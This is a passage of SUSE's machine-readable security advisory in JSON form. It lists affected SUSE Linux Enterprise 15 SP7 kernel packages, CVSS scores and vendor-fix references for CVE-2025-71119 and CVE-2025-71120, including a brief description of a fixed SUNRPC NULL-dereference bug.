"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
